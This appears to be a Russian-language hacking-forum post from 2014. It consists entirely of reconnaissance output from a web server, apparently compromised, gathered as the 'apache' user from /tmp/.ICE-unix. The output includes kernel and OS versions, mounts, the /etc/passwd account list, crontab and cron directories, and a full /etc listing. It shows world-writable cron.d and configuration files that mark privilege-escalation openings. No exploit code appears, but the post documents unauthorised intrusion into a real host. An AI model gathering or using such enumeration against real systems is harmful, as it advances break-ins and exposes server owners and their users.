Старый 13.09.2014, 19:12   #1111
ewi
 
Регистрация: 02.04.2014
Сообщений: 75
Репутация: 2
По умолчанию

Код:
================================================
uname -a
================================================
Linux ******* 3.13.5 #1 SMP Thu Mar 6 23:21:56 CET 2014 x86_64 x86_64 x86_64 GNU/Linux

================================================
mount
================================================
/dev/xvda1 on / type ext3 (rw)
none on /proc type proc (rw)
none on /sys type sysfs (rw)
none on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/xvda3 on /tmp type ext4 (rw)
/dev/xvda4 on /var/spool/mail type ext4 (rw)
/dev/xvda5 on /var/lib/mysql type ext4 (rw,noatime)
/dev/xvda6 on /www type ext4 (rw)
/dev/xvda7 on /var/log type ext4 (rw)
none on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

================================================
df -h
================================================
Filesystem            Size  Used Avail Use% Mounted on
/dev/xvda1             20G   12G  6.5G  65% /
/dev/xvda3            969M  115M  789M  13% /tmp
/dev/xvda4             99G   86G  7.7G  92% /var/spool/mail
/dev/xvda5             30G   17G   12G  58% /var/lib/mysql
/dev/xvda6            247G  163G   77G  69% /www
/dev/xvda7            9.5G  5.0G  4.1G  56% /var/log
none                  2.7G     0  2.7G   0% /dev/shm

================================================
ls -la /boot
================================================
total 113828
drwxr-xr-x  4 root root     4096 Mar  6  2014 .
drwxr-xr-x 23 root root     4096 Aug 27 00:51 ..
lrwxrwxrwx  1 root root       23 Mar  6  2014 System.map -> /boot/System.map-3.13.5
-rw-r--r--  1 root root  1091650 Mar 16  2007 System.map-2.6.18-8.el5xen
-rw-r--r--  1 root root  3033778 Mar  6  2014 System.map-3.13.5
-rw-r--r--  1 root root  2369894 Apr  2  2013 System.map-3.2.42
-rw-r--r--  1 root root  2678935 Apr  4  2013 System.map-3.4.38
-rw-r--r--  1 root root  2832472 Apr  4  2013 System.map-3.8.5
-rw-r--r--  1 root root    58600 Mar 16  2007 config-2.6.18-8.el5xen
-rw-r--r--  1 root root   147131 Mar  6  2014 config-3.13.5
-rw-r--r--  1 root root   110192 Apr  2  2013 config-3.2.42
-rw-r--r--  1 root root   128181 Apr  4  2013 config-3.4.38
-rw-r--r--  1 root root   137921 Apr  4  2013 config-3.8.5
drwxr-xr-x  2 root root     4096 Mar  7  2014 grub
-rw-------  1 root root  1436947 Nov 25  2007 initrd-2.6.18-8.el5xen.img
-rw-------  1 root root  2536733 Mar  6  2014 initrd-3.13.5.img
-rw-------  1 root root  2315510 Apr  4  2013 initrd-3.2.42.img
-rw-------  1 root root  2513982 Apr  4  2013 initrd-3.4.38.img
-rw-------  1 root root  2524097 Apr  4  2013 initrd-3.8.5.img
drwx------  2 root root     4096 Nov 25  2007 lost+found
-rw-r--r--  1 root root    80032 Mar 16  2009 message
-rw-r--r--  1 root root    85349 Mar 16  2007 symvers-2.6.18-8.el5xen.gz
-rw-r--r--  1 root root   242745 Mar 30  2013 symvers-3.8.1-1.x86_64.gz
-rwxr-xr-x  1 root root  5710728 Mar  6  2014 vmlinux-3.13.5.bz2
-rwxr-xr-x  1 root root 54134976 Apr  2  2013 vmlinux-3.2.42.bz2
-rwxr-xr-x  1 root root  5071056 Apr  4  2013 vmlinux-3.4.38.bz2
-rwxr-xr-x  1 root root  5384864 Apr  4  2013 vmlinux-3.8.5.bz2
lrwxrwxrwx  1 root root       20 Mar  6  2014 vmlinuz -> /boot/vmlinuz-3.13.5
-rw-r--r--  1 root root  1893708 Mar 16  2007 vmlinuz-2.6.18-8.el5xen
-rw-r--r--  1 root root  4982800 Mar  6  2014 vmlinuz-3.13.5
-rw-r--r--  1 root root  4613824 Apr  2  2013 vmlinuz-3.2.42
-rw-r--r--  1 root root  4439152 Apr  4  2013 vmlinuz-3.4.38
-rw-r--r--  1 root root  4738448 Apr  4  2013 vmlinuz-3.8.5
-rwxr-xr-x  1 root root   642368 Mar 16  2007 xen-syms-2.6.18-8.el5
-rw-r--r--  1 root root   276329 Mar 16  2007 xen.gz-2.6.18-8.el5

================================================
cat /proc/version
================================================
Linux version 3.13.5 (root@******) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-1) (GCC) ) #1 SMP Thu Mar 6 23:21:56 CET 2014

================================================
pwd
================================================
/tmp/.ICE-unix

================================================
id
================================================
uid=48(apache) gid=48(apache) groups=48(apache),104(bacula)

================================================
whoami
================================================
apache

================================================
cat /etc/passwd
================================================
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
clamav:x:100:101:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
vmail:x:502:12:vmail-user:/home/vmail:/bin/false
devel:x:500:500::/home/devel:/bin/bash
postgrey:x:101:102::/var/spool/postfix/postgrey:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
munin:x:102:103:Munin user:/var/lib/munin:/bin/nologin
vu2000:x:2000:2000:vu-master:/var/www/fcgi/master:/bin/false
vu2002:x:2002:2002:virtual-user:/var/www/virtual/*******.**:/bin/false
... [ХОСТЫ] ...
monit:x:454:454:monit daemon:/var/lib/monit:/bin/sh
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sqlgrey:x:3467:3467::/var/sqlgrey:/bin/true

================================================
cat /etc/issue
================================================
CentOS release 5.10 (Final)
Kernel \r on an \m


================================================
cat /etc/issue.net
================================================
CentOS release 5.10 (Final)
Kernel \r on an \m

================================================
cat /proc/sys/vm/mmap_min_addr
================================================
4096

================================================
cat /etc/crontab
================================================
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=""
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly


================================================
ls -la /etc/cron.d
================================================
total 212
drwxrwxrwx  2 root          root    4096 Mar  7  2014 .
drwxr-xr-x 94 root          root   12288 Sep 12 04:08 ..
-rwxr--r--  1 root          root      45 Nov 20  2013 00_server-status
-rwxrwxr--  1 root          apache   136 Dec 29  2010 00awstats
-rwxrwxr--  1 root          apache    56 Dec  5  2010 *******.php
-rwxrwxr--  1 root          apache    68 Apr 26  2012 02vhcs2-mgr
-rwxrwxr--  1 ******** apache    91 Oct 23  2012 alex.sh
-rwxrwxr-x  1 ******** apache    97 Nov 15  2012 *********.sh
-rwxrwxr--  1 ******** apache   102 Oct 23  2012 *********
-rwxrwxr--  1 root          apache    94 Oct 23  2012 *******.**
-rwxrwxr-x  1 ******** apache   116 Oct 23  2012 *******.sh
-rwxrwxr--  1 root          apache   286 Oct 23  2012 *******.**
-rwxrwxr-x  1 ******** apache   433 Nov 28  2013 ******9**.sh
-rwxrwxr-x  1 ******** apache   109 Nov 28  2013 *******.**-mailing
-rwxrwxr--  1 ******** apache   186 Oct 23  2012 *******.**
-rwxrwxr--  1 root          apache    93 Oct 23  2012 *******.**
-rwxrwxr--  1 root          apache   186 Oct 23  2012 *******.**
-rwxrwxr--  1 root          apache   110 Oct 23  2012 *******.**
-rwxrwxr--  1 ******** apache   116 Dec 18  2013 *******.**
-rwxrwxr--  1 root          apache   100 Oct 23  2012 *******.**
-rwxrwxr--  1 ******** apache   180 Oct 23  2012 *******.**
-rwxrwxr--  1 ******** apache    97 Oct 23  2012 *******.**
-rwxrwxr--  1 root          apache   111 Jul 10  2013 **********.**-mailing
-rwxrwxr--  1 root          apache   658 May 24  2013 *******.**
-rw-rw-r--  1 ******** apache   102 Oct 23  2012 *******.**
-rwxrwxr--  1 ******** apache    96 Oct 23  2012 *******.**
-rwxrwxr-x  1 ******** apache   104 Oct 23  2012 *******.**
-rw-rw-r--  1 ******** apache   182 Oct 23  2012 mailing.sh
-rw-r--r--  1 root          root     170 Mar 14  2014 mailman
-rwxrwxr--  1 root          apache   114 Nov 12  2007 munin
-rwxrwxr--  1 root          apache   102 Oct 23  2012 *******
-rwxrwxr--  1 root          apache   114 Oct 23  2012 *******
-rwxrwxr--  1 root          apache    92 Oct 23  2012 *******.**
-rwxrwxr--  1 root          apache   106 Oct 23  2012 *******.**
-rwxrwxr--  1 root          apache    94 Oct 23  2012 *****.**
-rwxr--r--  1 ******** apache   191 Apr 24  2013 *******.**
-rwxrwxr-x  1 ******** apache    95 Oct 23  2012 suncity.sh
-rwxrwxr--  1 root          apache   514 Oct 23  2012 ******.**
-rwxrwxr--  1 root          apache   190 Mar  4  2011 sysstat
-rwxrwxr--  1 root          apache   199 Oct 23  2012 *******.**_seznam
-rwxrwxr--  1 root          apache   333 Oct 23  2012 *******.**
-rw-r--r--  1 root          root     411 Oct 25  2012 vhcs2phptemp
-rwxrwxr--  1 root          apache    96 Oct 23  2012 *******.**

================================================
ls -la /etc/cron.hourly
================================================
total 48
drwxr-xr-x  2 root          root    4096 Jan  9  2013 .
drwxr-xr-x 94 root          root   12288 Sep 12 04:08 ..
-rwxrwxr--  1 root          apache   209 Feb 29  2012 00awstats
-rwxrwxr--  1 ******** apache    77 Jun 22  2011 *******.**
-rwxrwxr--  1 ******** apache    77 Jul 12  2011 *******.**
-rwxrwxr-x  1 ******** apache    82 Sep 14  2011 materialyonline-feed.sh
-rwxrwxr--  1          2453   2453    74 Feb 22  2011 *******.**
-rwxrwxr--  1          2453   2453    81 Jun  7  2011 *******.**
-rwxrwxrwx  1 ******** apache    77 Jan 31  2012 *******.sh

================================================
ls -la /etc/cron.monthly
================================================
total 20
drwxr-xr-x  2 root root  4096 Jan  9  2013 .
drwxr-xr-x 94 root root 12288 Sep 12 04:08 ..

================================================
ls -la /etc/cron.weekly
================================================
total 28
drwxr-xr-x  2 root root    4096 Mar  8  2013 .
drwxr-xr-x 94 root root   12288 Sep 12 04:08 ..
-rwxr-xr-x  1 root root     414 May 30  2012 makewhatis.cron
-rwxrwxr--  1 root apache    27 Apr 21  2011 quota

================================================
ls -la /etc
================================================
total 4284
drwxr-xr-x 94 root   root      12288 Sep 12 04:08 .
drwxr-xr-x 23 root   root       4096 Aug 27 00:51 ..
-rw-------  1 root   root          0 Nov 25  2007 .pwd.lock
-rw-r--r--  1 root   root       2518 Mar 21  2012 DIR_COLORS
-rw-r--r--  1 root   root       2420 Mar 21  2012 DIR_COLORS.xterm
-rw-r--r--  1 root   root        588 Sep  6  2011 GeoIP.conf
-rw-r--r--  1 root   root        588 Sep  6  2011 GeoIP.conf.default
drwxr-xr-x  6 root   root       4096 Oct 21  2013 X11
-rw-r--r--  1 root   root         12 Oct  1  2013 adjtime
-rw-r--r--  1 root   root       1527 Dec 22  2013 aliases
-rw-r--r--  1 root   root      12288 Mar 13  2014 aliases.db
drwxr-xr-x  4 root   root       4096 Apr  1  2009 alsa
drwxr-xr-x  2 root   root       4096 Mar 13  2014 alternatives
-rw-rw-rw-  1 root   root      32187 Jun 26  2007 amavisd.conf
drwxr-xr-x  3 root   root       4096 Nov 13  2010 apt
drwxr-xr-x  5 root   root       4096 Apr 17  2012 asciidoc
-rw-------  1 root   root          1 Jan 27  2010 at.deny
drwxr-x---  3 root   root       4096 Mar  7  2014 audisp
drwxr-x---  2 root   root       4096 Mar  7  2014 audit
drwxr-xr-x  2 daemon daemon     4096 Sep 11 16:21 authlib
drwxr-xr-x  4 root   root       4096 Apr 26  2011 avahi
drwxr-xr-x  2 root   root      16384 Aug 14 21:34 awstats
drwxr-xr-x  2 root   root       4096 Jun 21  2013 bash_completion.d
-rw-r--r--  1 root   root       1709 Apr 11  2011 bashrc
-rw-r--r--  1 root   root       1872 Feb 22  2012 bashrc.rpmnew
-rw-r--r--  1 root   root    1310700 Dec 20  2013 blacklist.dat
drwxr-xr-x  2 root   root       4096 Aug 27 00:51 blkid
drwxr-xr-x  2 root   root       4096 Oct 26  2010 bonobo-activation
-rw-r--r--  1 root   root          0 Dec 26  2007 cd
-rw-rw-rw-  1 root   root       9269 Jun 26  2007 clamd.conf
drwxr-xr-x 11 daemon daemon     4096 Mar  7  2014 courier
drwxrwxrwx  2 root   root       4096 Mar  7  2014 cron.d
drwxr-xr-x  2 root   root       4096 Jun 22 13:41 cron.daily
-rwxrwxr--  1 root   apache        0 Nov 27  2007 cron.deny
drwxr-xr-x  2 root   root       4096 Jan  9  2013 cron.hourly
drwxr-xr-x  2 root   root       4096 Jan  9  2013 cron.monthly
drwxr-xr-x  2 root   root       4096 Mar  8  2013 cron.weekly
-rw-r--r--  1 root   apache      254 Oct 23  2012 crontab
-rw-r--r--  1 root   root       1044 Feb 22  2012 csh.cshrc
-rw-r--r--  1 root   root        823 Feb 22  2012 csh.login
drwxr-xr-x  4 root   root       4096 Oct 21  2013 dbus-1
drwxr-xr-x  2 root   root       4096 Oct 21  2013 default
drwxr-xr-x  2 root   root       4096 Oct 21  2013 depmod.d
drwxr-xr-x  3 root   root       4096 Jan  9  2013 dev.d
-rw-r--r--  1 root   root        178 Mar  6  2011 dhcp6c.conf
-rw-r--r--  1 root   root       9420 Dec 20  2013 dhparams.pem
-rw-r--r--  1 root   root      18484 Sep  1  2009 dnsmasq.conf
drwxr-xr-x  2 root   root       4096 Sep  1  2009 dnsmasq.d
-rw-r--r--  1 root   root          0 Feb 22  2012 environment
-rw-r--r--  1 root   root        153 Feb 22  2012 esd.conf
-rw-r--r--  1 root   root          0 Jan 13  2000 exports
-rw-r--r--  1 root   root         59 Jan 31  2006 filesystems
drwxr-xr-x  4 root   root       4096 Feb  4  2008 fonts
-rw-r--r--  1 root   root       1094 Feb 27  2012 freetds.conf
-rw-r--r--  1 root   root       3650 Jun 22 13:42 freshclam.conf
-rw-r--r--  1 root   root       8664 Jun 22 13:42 freshclam.conf.rpmnew
-rw-r--r--  1 root   root        606 Mar 31  2013 fstab
-rw-r--r--  1 root   root        604 Feb 20  2012 fstab.bak
-rw-r--r--  1 root   root        187 Nov 25  2007 ftpusers
drwxr-xr-x  6 root   root       4096 Feb  4  2008 gconf
drwxr-xr-x  2 root   root       4096 Oct 24  2013 gcrypt
drwxr-xr-x  2 root   root       4096 Sep 24  2013 ghostscript
drwxr-xr-x  3 root   root       4096 Aug  1  2013 gnome-vfs-2.0
-rw-r--r--  1 root   root      10793 Jan  6  2007 gnome-vfs-mime-magic
-rw-r--r--  1 root   root       1756 Jan  6  2007 gpm-root.conf
-rw-r--r--  1 root   root       4015 Aug 26 22:52 group
-rw-------  1 root   root       3999 Feb 12  2014 group-
-rw-r--r--  1 root   root        833 Mar 14  2007 gssapi_mech.conf
drwxr-xr-x  3 root   root       4096 Oct  1  2013 gtk-2.0
drwxr-xr-x  3 root   root       4096 Jan  9  2013 hal
-rw-r--r--  1 root   root          0 Feb 22  2012 host.conf
-rw-r--r--  1 root   root        323 Oct 26  2012 hosts
-rw-r--r--  1 root   root        161 Jan 13  2000 hosts.allow
-rw-r--r--  1 root   root        319 Dec 25  2007 hosts.bkp
-rw-r--r--  1 root   root        165 Feb 22  2012 hosts.deny
drwxr-xr-x  4 root   root       4096 Aug 27 15:30 httpd
-rw-r--r--  1 root   root        293 Jul 22  2011 idmapd.conf.rpmsave
-rw-r--r--  1 root   root       1810 May 20  2010 idn.conf
-rw-r--r--  1 root   root       1810 May 20  2010 idn.conf.sample
-rw-r--r--  1 root   root        207 May 20  2010 idnalias.conf
lrwxrwxrwx  1 root   root         11 May 16  2010 init.d -> rc.d/init.d
-rw-r--r--  1 root   root        658 Oct  1  2013 initlog.conf
-rw-r--r--  1 root   root       1809 Feb 11  2014 inittab
-rw-r--r--  1 root   root        758 Sep 23  2004 inputrc
drwxr-xr-x  2 root   root       4096 Mar  8  2013 iproute2
drwxr-xr-x  2 root   root       4096 Mar  8  2013 iscsi
drwxr-xr-x 11 root   root       4096 Dec 26  2007 ispcp
-rw-r--r--  1 root   root         48 Oct  7  2013 issue
-rw-r--r--  1 root   root         47 Oct  7  2013 issue.net
-rw-r--r--  1 root   root        608 May  7 18:02 krb5.conf
-rw-r--r--  1 root   root      45053 Aug 27 22:40 ld.so.cache
-rw-r--r--  1 root   root         28 Oct  8  2006 ld.so.conf
drwxr-xr-x  2 root   root       4096 Jun 22 13:42 ld.so.conf.d
-rw-r-----  1 root   root        191 Oct 27  2011 libaudit.conf
-rw-r--r--  1 root   root       2506 Aug  7  2012 libuser.conf
drwx------  3 root   root       4096 Apr 10  2011 libvirt
-rw-r--r--  1 root   root        370 Feb 27  2012 locales.conf
lrwxrwxrwx  1 root   root         33 Jul 30  2012 localtime -> /usr/share/zoneinfo/Europe/Prague
drwxr-xr-x  4 root   root       4096 Feb  4  2008 log.d
-rw-r--r--  1 root   root       1503 Jan  9  2013 login.defs
-rw-r--r--  1 root   root        518 Dec 16  2011 logrotate.conf
drwxr-xr-x  2 root   root       4096 Jun 22 13:42 logrotate.d
drwxr-xr-x  2 root   root       4096 Apr 10  2011 lsb-release.d
drwxr-xr-x  5 root   root       4096 Oct 21  2013 lvm
drwxr-xr-x  2 root   root       4096 Mar 30  2013 mail
-rw-r--r--  1 root   root        112 Jan  7  2007 mail.rc
-rw-r--r--  1 root   root        293 Jan  7  2007 mailcap
drwxrwsr-x  2 root   mailman    4096 Dec  3  2013 mailman
drwxr-xr-x  2 root   root       4096 Nov 25  2007 makedev.d
-rw-r--r--  1 root   root       4617 May 30  2012 man.config
drwxr-xr-x  2 root   root       4096 Apr 13 04:15 mc
drwxr-xr-x  2 root   root       4096 May 15  2011 mgetty+sendfax
-rw-r--r--  1 root   root      14100 Jan  7  2007 mime.types
-rw-r--r--  1 root   root        330 May  9  2013 mke2fs.conf
-rw-r--r--  1 root   root        801 Sep  7  2009 mke4fs.conf
-rw-r--r--  1 root   root         48 Nov 25  2007 modprobe.conf
drwxr-xr-x  2 root   root       4096 Oct 30  2013 modprobe.d
-rw-------  1 root   root       9023 Oct 15  2013 monit.conf
-rw-------  1 root   root      10652 Mar 20  2013 monit.conf.rpmnew
drwxr-xr-x  2 root   root       4096 Aug 29 10:52 monit.d
-rw-r--r--  1 root   root          0 Jan 13  2000 motd
-rw-r--r--  1 root   root        363 Aug 27 00:51 mtab
-rw-r--r--  1 root   root       2706 Apr 17 09:52 multipath.conf
drwxr-xr-x  6 root   root       4096 Apr 26 03:08 munin
-rw-r--r--  1 root   root       3725 Mar  6  2014 my.cnf
-rw-r--r--  1 root   root       1007 Apr 18  2013 my.cnf.rpmnew
drwxr-x---  2 root   named      4096 Oct 26  2012 named
-rw-r--r--  1 root   root      52370 Aug 11 10:53 named.conf
-rw-r--r--  1 root   root      56183 Oct 26  2012 named.conf.bkp
drwxr-xr-x  2 root   root       4096 Oct 21  2013 netplug
drwxr-xr-x  2 root   root       4096 Oct 21  2013 netplug.d
-rw-r--r--  1 root   root       1696 Sep 23  2004 nsswitch.conf
drwxr-x---  2 root   ntp        4096 Mar 13  2012 ntp
-rw-r-----  1 root   ntp        1963 Jul 30  2012 ntp.conf
-rw-r--r--  1 root   root          0 Feb 22  2012 odbc.ini
-rw-r--r--  1 root   root       1366 Feb 22  2012 odbcinst.ini
drwxr-xr-x  3 root   root       4096 Jun 22 13:41 openldap
drwxr-xr-x  2 root   root       4096 May 11  2011 opt
drwxr-xr-x  2 root   root       4096 Jul  8 12:50 pam.d
drwxr-xr-x  3 root   root       4096 Sep 30  2011 pango
-rw-r--r--  1 root   root      15895 Aug 26 22:52 passwd
-rw-r--r--  1 root   root      15851 Feb 12  2014 passwd-
drwxr-xr-x  2 root   root       4096 Sep  2  2010 pear
-rw-r--r--  1 root   root        946 Sep  2  2010 pear.conf
-rw-r--r--  1 root   root      45359 Dec  5  2010 php-cli.ini
drwxr-xr-x  2 root   root       4096 Mar 17 22:37 php.d
-rw-r--r--  1 root   root      45535 Mar 19 16:23 php.ini
drwxr-xr-x  6 root   root       4096 Aug 27 18:56 pki
drwxr-xr-x  5 root   root       4096 Mar  8  2013 pm
drwxr-xr-x  2 root   root       4096 Jun 15 11:28 policyd
-rw-r--r--  1 root   root        219 Feb 27  2012 pool.conf
drwxr-xr-x  4 root   root       4096 Aug 26 18:43 postfix
drwxr-xr-x  3 root   root       4096 Oct 21  2013 ppp
-rw-r--r--  1 root   root     211468 Sep 12 04:08 prelink.cache
-rw-r--r--  1 root   root        973 Sep 18  2008 prelink.conf
drwxr-xr-x  2 root   root       4096 Jan 21  2009 prelink.conf.d
-rw-r--r--  1 root   root        135 Apr 10  2011 printcap
-rw-r--r--  1 root   root       1344 Feb 22  2012 profile
drwxr-xr-x  2 root   root       4096 Jun 22 13:41 profile.d
-rw-r--r--  1 root   root       4687 Nov  1  2012 proftpd.conf
-rw-r-----  1 root   root       9714 Nov 10  2011 proftpd.conf.rpmnew
-rw-r--r--  1 root   root       6108 Oct 11  2006 protocols
-rw-r--r--  1 root   root        220 Jan  9  2013 quotagrpadmins
-rw-r--r--  1 root   root        290 Jan  9  2013 quotatab
lrwxrwxrwx  1 root   root          7 Oct 21  2013 rc -> rc.d/rc
drwxr-xr-x 10 root   root       4096 Oct 21  2013 rc.d
lrwxrwxrwx  1 root   root         13 Oct 21  2013 rc.local -> rc.d/rc.local
lrwxrwxrwx  1 root   root         15 Oct 21  2013 rc.sysinit -> rc.d/rc.sysinit
lrwxrwxrwx  1 root   root         10 Oct 21  2013 rc0.d -> rc.d/rc0.d
lrwxrwxrwx  1 root   root         10 Oct 21  2013 rc1.d -> rc.d/rc1.d
lrwxrwxrwx  1 root   root         10 Oct 21  2013 rc2.d -> rc.d/rc2.d
lrwxrwxrwx  1 root   root         10 Oct 21  2013 rc3.d -> rc.d/rc3.d
lrwxrwxrwx  1 root   root         10 Oct 21  2013 rc4.d -> rc.d/rc4.d
lrwxrwxrwx  1 root   root         10 Oct 21  2013 rc5.d -> rc.d/rc5.d
lrwxrwxrwx  1 root   root         10 Oct 21  2013 rc6.d -> rc.d/rc6.d
drwxr-xr-x  2 root   root       4096 Apr 10  2011 redhat-lsb
-rw-r--r--  1 root   root         28 Oct  7  2013 redhat-release
-rw-r--r--  1 root   root         99 Oct 25  2012 resolv.conf
-rw-r-----  1 root   root      37347 May  3  2012 rkhunter.conf
-rw-r-----  1 root   named       113 Nov 25  2007 rndc.key
-rw-r--r--  1 root   root       1615 Aug 30  2001 rpc
drwxr-xr-x  2 root   root       4096 Mar 17 22:37 rpm
-rw-r--r--  1 root   root        754 Oct  1  2013 rwtab
drwxr-xr-x  2 root   root       4096 Oct  1  2013 rwtab.d
drwxr-xr-x  2 root   root       4096 Jul  8 13:49 sasl2
-rw-rw-rw-  1 root   root      24576 Sep 11 16:21 sasldb2
-rw-r--r--  1 root   root       7330 Apr 10  2011 screenrc
-rw-r--r--  1 root   root        666 Jan  9  2013 scsi_id.config
-rw-------  1 root   root        132 Feb 20  2012 securetty
drwxr-xr-x  5 root   root       4096 Mar  6  2014 security
drwxr-xr-x  3 root   root       4096 Oct 21  2013 selinux
-rw-r--r--  1 root   root      85179 Mar 31  2010 sensors.conf
-rw-r--r--  1 root   root     362031 Feb 23  2006 services
-rw-r--r--  1 root   root        216 Oct  1  2013 sestatus.conf
drwxr-xr-x  2 root   root       4096 Feb 19  2012 sgml
-r--------  1 root   root       5069 Aug 26 22:52 shadow
-r--------  1 root   root       5039 Apr 14 11:26 shadow-
-rw-r--r--  1 root   root         32 Mar 29  2002 shells
drwxr-xr-x  3 root   root       4096 Aug  9  2013 skel
drwxr-xr-x  3 root   root       4096 Nov 13  2010 smart
-rw-r--r--  1 root   root       3139 Oct 27  2008 smartd.conf
drwxr-xr-x  2 root   root       4096 Nov 13  2013 smrsh
drwxr-xr-x  2 root   root       4096 Mar 25 16:49 snmp
drwxr-xr-x  3 root   root       4096 Aug  1  2013 sound
drwxr-xr-x  2 root   root       4096 Sep  9 23:09 sqlgrey
drwxr-xr-x  2 root   root       4096 Mar 17 22:35 ssh
drwxr-xr-x  9 root   root       4096 Jul  6 22:21 sysconfig
-rw-r--r--  1 root   root       1049 Jul 30  2012 sysctl.conf
-rw-r--r--  1 root   root        996 Oct  1  2013 sysctl.conf.rpmnew
drwxr-xr-x  2 root   root       4096 Oct 15  2013 syslog-ng
-rw-r--r--  1 root   root        698 Sep 29  2011 syslog.conf.rpmsave
drwxr-xr-x  2 root   root       4096 Feb  3  2011 t1lib
-rw-r--r--  1 root   root     807103 Jan  6  2007 termcap
drwxr-xr-x  4 root   root       4096 Mar  8  2013 udev
-rw-r--r--  1 root   root        136 Sep  3  2009 updatedb.conf
drwxr-xr-x 10 root   root       4096 Oct 26  2012 vhcs2
-rw-r--r--  1 root   root       1533 Jan  9  2013 vimrc
-rw-r--r--  1 root   root       1533 Jan  9  2013 virc
drwxr-xr-x  2 root   root       4096 Feb 19  2012 w3m
-rw-r--r--  1 root   root       2678 Jan  9  2013 warnquota.conf
-rw-r--r--  1 root   root       4204 May 10  2012 wgetrc
drwxr-xr-x  3 root   root       4096 Mar  9  2009 xdg
-rw-r--r--  1 root   root       1001 Oct  8  2013 xinetd.conf
drwxr-xr-x  2 root   root       4096 Feb 13  2014 xinetd.d
drwxr-xr-x  2 root   root       4096 Feb 19  2012 xml
drwxr-xr-x  3 root   root       4096 Jul 26  2012 yum
-rw-r--r--  1 root   root        379 Jul 26  2012 yum.conf
drwxr-xr-x  2 root   root       4096 Jun 23 16:05 yum.repos.d

================================================
ls -la --full-time /lib
================================================
total 64
drwxr-xr-x  8 root root 4096 2013-03-08 21:47:41.000000000 +0100 .
drwxr-xr-x 23 root root 4096 2014-08-27 00:51:35.000000000 +0200 ..
lrwxrwxrwx  1 root root   14 2013-03-08 21:47:41.000000000 +0100 cpp -> ../usr/bin/cpp
drwxr-xr-x 38 root root 4096 2014-03-06 23:35:59.000000000 +0100 firmware
drwxr-xr-x  6 root root 4096 2013-01-09 04:14:22.000000000 +0100 kbd
drwxr-xr-x  2 root root 4096 2011-04-10 17:30:43.000000000 +0200 lsb
drwxr-xr-x  7 root root 4096 2014-03-06 23:35:59.000000000 +0100 modules
drwxr-xr-x  2 root root 4096 2014-07-06 23:49:54.000000000 +0200 security
drwxr-xr-x  3 root root 4096 2013-11-22 04:07:13.000000000 +0100 udev

================================================
ls -la --full-time /lib64
================================================
total 21076
drwxr-xr-x  8 root root   12288 2014-08-28 04:08:35.000000000 +0200 .
drwxr-xr-x 23 root root    4096 2014-08-27 00:51:35.000000000 +0200 ..
-rw-r--r--  1 root root      65 2014-08-27 22:32:35.000000000 +0200 .libcrypto.so.0.9.8n.hmac
lrwxrwxrwx  1 root root      25 2014-08-27 22:39:09.000000000 +0200 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8n.hmac
lrwxrwxrwx  1 root root      25 2014-08-27 22:39:12.000000000 +0200 .libcrypto.so.8.hmac -> .libcrypto.so.0.9.8n.hmac
-rw-r--r--  1 root root      65 2014-08-27 22:32:35.000000000 +0200 .libssl.so.0.9.8n.hmac
lrwxrwxrwx  1 root root      22 2014-08-27 22:39:14.000000000 +0200 .libssl.so.6.hmac -> .libssl.so.0.9.8n.hmac
lrwxrwxrwx  1 root root      22 2014-08-27 22:39:15.000000000 +0200 .libssl.so.8.hmac -> .libssl.so.0.9.8n.hmac
drwxr-xr-x  2 root root    4096 2013-10-21 23:04:33.000000000 +0200 bdevid
drwxr-xr-x  2 root root    4096 2013-10-22 04:07:36.000000000 +0200 dbus-1
drwxr-xr-x  2 root root    4096 2013-10-21 23:04:16.000000000 +0200 device-mapper
drwxr-xr-x  2 root root    4096 2013-03-08 21:47:51.000000000 +0100 iptables
-rwxr-xr-x  1 root root  144776 2013-10-08 21:20:37.000000000 +0200 ld-2.5.so
lrwxrwxrwx  1 root root       9 2013-10-21 23:03:40.000000000 +0200 ld-linux-x86-64.so.2 -> ld-2.5.so
lrwxrwxrwx  1 root root      20 2013-10-21 23:05:00.000000000 +0200 ld-lsb-x86-64.so -> ld-linux-x86-64.so.2
lrwxrwxrwx  1 root root      20 2011-04-10 17:30:43.000000000 +0200 ld-lsb-x86-64.so.3 -> ld-linux-x86-64.so.2
